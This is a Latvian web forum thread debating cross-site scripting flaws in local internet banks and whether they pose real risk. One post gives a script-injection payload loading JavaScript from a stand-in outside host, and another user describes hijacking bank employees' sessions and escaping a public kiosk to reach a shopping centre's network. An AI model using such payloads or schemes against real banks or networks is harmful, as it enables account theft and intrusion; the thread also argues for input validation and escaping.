Jump to content
php.lv forumi

Latvijas iBanku aizsardziba+caurumi


uraals

Recommended Posts

Normālā gadījumā tirgotājam jādomā par savas lapas aizsardzību, lai caur tavu lapu neietu XSS uz ibanku, jo tev ar ibanku ir līgums un viņi var tevi dabūt rokā, ja rīkosies ļaunprātīgi, bet tu nevarēsi dabūt rokā tos, kas uzlauzīs tavu serveri un nomainīs kodu, kuram normālā variantā klāt var tikt tikai izstrādātāji (kuri neliks XSS). Tas, ka cilvēks maina caur sava browsera sesiju ejošas transakcijas parametrus un ievada tur XSS, kuru pats saņem atpakaļ... nez vai tas ir caurums. Vispār, izskatās, ka ir, jo kāds var ļaunprātīgi izveidot lapu, kurā it kā virza cilvēkus uz apmaksu, bet reāli cenšas nozagt datus.

 

Starp citu, nekādi nespēju saprast, kāpēc daudzi programmētāji nerīkojas pēc elementāra likuma - visi dati, kuru izcelsme ir no ārpuses, ir vai nu jāfiltrē/jāvalidē PĒC saņemšanas un jāeskeipo priekš db PIRMS query izveides un/vai jāeskeipo priekš HTML PIRMS IZVADES HTML/XHTML/XML... Šajā gadījumā šādi:

 

 

ebank_sid=</script><script src=http://yoyo.yo/yo.js></script><script>

 

Vai šādi:

 

ebank_sid=/scriptscript src=http://yoyo.yo/yo.js/scriptscript

 

Tas ir elementāri, bet daudzi programmētāji ir resni tūļas un baidās domāt... Nācies redzēt daudzu komiskus risinājumus

 

Un tas Apsveikums blogā... arī šeit redzams diženo programmētāju lielais sasniegums, manuprāt, ikvienā no lielajiem ietvariem e-pastu sūtīšanas bibliotēka kā vienu no pirmajām priekšrocībām satur to, ka novērš aprakstīto variantu bez nepieciešamības programmētājam vispār iedziļināties meilu protokolos.

Edited by Mr.Key
Link to comment
Share on other sites

Tur tā lieta, ka nav pentestētāju lielajās kompānijās. Pat mazajās lapelēs cilvēkiem par to maksā, lai testētu, bet kur nu swedbanka u.t.t.

Ievietošu savā blogā vēl draugiem.lv xss + citus bagus.

Skatos ka Krediidipank - ekp.lv ir ļoti apgreidots: https://ibank.ekp.lv/webdav/index.html

Pagaidām dzeru pivasiku, slinkums vispār kaut ko darīt :D

Edited by uraals
Link to comment
Share on other sites

Lielajās organizācijās cita kultūra, tas pirmkārt. Piemēram, IT cilvēkiem labāk patīk runāt par ralliju vai medībām, nevis par vakardienas nozares aktualitātēm un to, kā tas ietekmē aizvakardien notikušo. Spilvens liels, visiem silti, juristi arī ir.

 

Otrkārt, īsti neesmu drošs, ka mazās lapās kāds par to maksā. Ja nu vienīgi tāda pakalpojuma reklāmas / pārdošanas aģenta mērķtiecīgas pārliecināšanas iespaidā.

Edited by Mr.Key
Link to comment
Share on other sites

XSS, protams pats par sevis ir bīstams, ja tas tiešām pieļauj iebarot "stulbam" userim linku, bet nepiekrītu, ka tas ko tu mini savā blogā par swedbank ir XSS ievainojamība. Reāli tu spēj sapist tikai savu bankas izskatu, bet nespēj to nodot tālāk citam userim!

Varbūt apgaismo mani ja kļūdos, bet šobrīd lai šo XSS iebarotu "stulbam" userim Tev nosākuma ir jāpanāk lai šis "stulbais" useris TEV iedod savu sesijas ID, kā tu plāno, ko tādu izdarīt?

 

Neesmu citadeles klients tāpēc nezinu kā tur ir ar to XSS. Email risinājums man liekas arī ir so-so, es gan nezinu kā ir, bet pēc tava screena spriežot e-pastu sūta no neīsta e-pasta, un ja tu mēģināsi izpamot pietiekami daudz e-pastus es ticu ka drīzāk šī sistēma nogāzīsies dēļ epasta servisa, nekā banku iekļaus melnajā sarakstā.

Vienīgais, ko es tevi varu apsveikt, tu esi atradis XSS iekš inboxa :D

Edited by draugz
Link to comment
Share on other sites

Draugz, kā jau apakšā savā blogā biju raxtījis:

Krievu Valoģa var aiziet uz swedbankas filiāli, laipni pajautāt, kas noticis ar viņa lietotāja kontu, filiāles darbiniece būdama ļoti laipna pret krieviem, izpēta Valoģas kontu, paskaidro, ka nekā viņa kontā īpatnēja neesot, viss kārtībā, kārtējo reizi pajautā par pensiju līmeņiem un uzcienā ar piparkūkām. Valoģa laimīgs aiziet mājās, ēdot piparkūku, atnākot viņš priecīgs apsēžās pie datora, un tur viņam stāv kas labāks par piparkūkām, bet gan cepumi un citas interesantas lietas, ko vien var iegūt injekcējot piparkūku darbinieces browseru. ©Uraals

Protams ka session id var dabūt, atkarībā kādu browser upuri izmanto.

Browser Statistics Month by Month

2012 Internet Explorer Firefox Chrome Safari Opera February 19.5 % 36.6 % 36.3 % 4.5 % 2.3 % January 20.1 % 37.1 % 35.3 % 4.3 % 2.4 %

 

Firefox Statistics

 

The following table is a breakdown of the Firefox numbers from our Browsers Statistics: 2012 Total FF 11 FF 10 FF 9 FF 8 FF 7 FF 6 FF 5 FF 4 FF 3.6 Other February 37.1% 0.6% 16.8% 7.4% 2.2% 1.2% 1.0% 1.0% 1.1% 4.3% 1.5% January 37.1% 0.1% 0.8% 17.8% 7.2% 1.5% 1.2% 1.1% 1.3% 5.0% 1.1%

 

u.t.t. redzams, ka daudzi joprojām izmanto vecas browser versijas, kurām ir publiski pieejami exploiti, caur kuriem var piekļūt ne da tikai session id, bet kā gan visai sistēmai. Pats skatījos swedbank filiālēs viņi izmanto savu browser versiju, diemžēl ar lokālo proxy, kurš neļauj neko ne laist, ne saņemt ārpus, šo sistēmu izmanto bankās citur pasaulē arī :D ( patestēju filiālē vai strādā pie klientu pieejamā datora :D )

Link to comment
Share on other sites

Urāls, pieņemu, Tev vispār nav bijusi pieredze kā tiek būvētas IT sistēmas lielās korporācijās.

1) tiešā piekļuve internetam ir liegta

2) Lielākā daļa IT sistēmu ir uz JAVA vai C# ar windows formām, respektīvi dati ielasās skaistos lodziņos un nevienā brīdī nerādās kā HTML kods

tādēļ

Krievu Valoģa var aiziet uz swedbankas filiāli, laipni pajautāt, kas noticis ar viņa lietotāja kontu, filiāles darbiniece būdama ļoti laipna pret krieviem, izpēta Valoģas kontu, paskaidro, ka nekā viņa kontā īpatnēja neesot, viss kārtībā, kārtējo reizi pajautā par pensiju līmeņiem un uzcienā ar piparkūkām. Valoģa laimīgs aiziet mājās, ēdot piparkūku, atnākot viņš priecīgs apsēžās pie datora, un tur viņam stāv kas labāks par piparkūkām, bet gan cepumi un citas interesantas lietas, ko vien var iegūt injekcējot piparkūku darbinieces browseru. ©Uraals

nedarbojas!

 

Par to sesijas iegūšanu tu jau sāc liet ūdeni... Pastāsti tad kāda sūda pēc vajag meklēt XSS ievainojamības, ja jau tik daudz cilvēki izmanto ievainojamus pārlūkus. Vieglāk taču ir uzreiz tad izmantot pārlūka exploitu

 

Vienīgais jāpiekrīt

Negribu iedziļināties, vai tā ir ievainojamība, bet kā addPageId= var būt kaut kāds HTML garbage, tas gan ir dīvaini. Sanāk, ka vērtības netiek validētas, saņemot pieprasījumu. Lousy practice :(

Ka tas tiešīm ir slikta prakse

Edited by draugz
Link to comment
Share on other sites

Draugz, tāpēc, ka nav jēga hakot 1 lietotāju, mūsdienās visi pēc iespējas visu automatizē uz masām, caur XSS tas ir viens no veidiem kā to vislabāk realizēt. Liela daļa cilvēku domā, ka tā nav problēma ( pat ļoti pieredzējuši cilvēki, kuri pārzin visus skriptus, ievainojamību veidus u.t.t. ) un tam nepievērš lielu uzmanību, bet kā jau teicu, šo "sūdu" var pielietot cik vien iztēle ir liela. Atceros, pirms laiciņa Galerija Centrs bija pieejami publiskie datori, kurus varēja izmantot tikai sērfošanā pa šī centra mājaslapu, ar XSS es spēju izkļut www un sērfot, darīt ko gribu, pačekoju viņu browsera versiju, jā tā bija viņu pašmodificēta, bet kura bija balstīta uz Internet Explorer, pie tam vel vecu versiju, caur kuru var ielādēt failus datorā, atvērt, tādējādi izejot no tā varētu pārņemt visu galleria centrs tīklu. Paplašini savu iztēli :D

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...
×
×
  • Create New...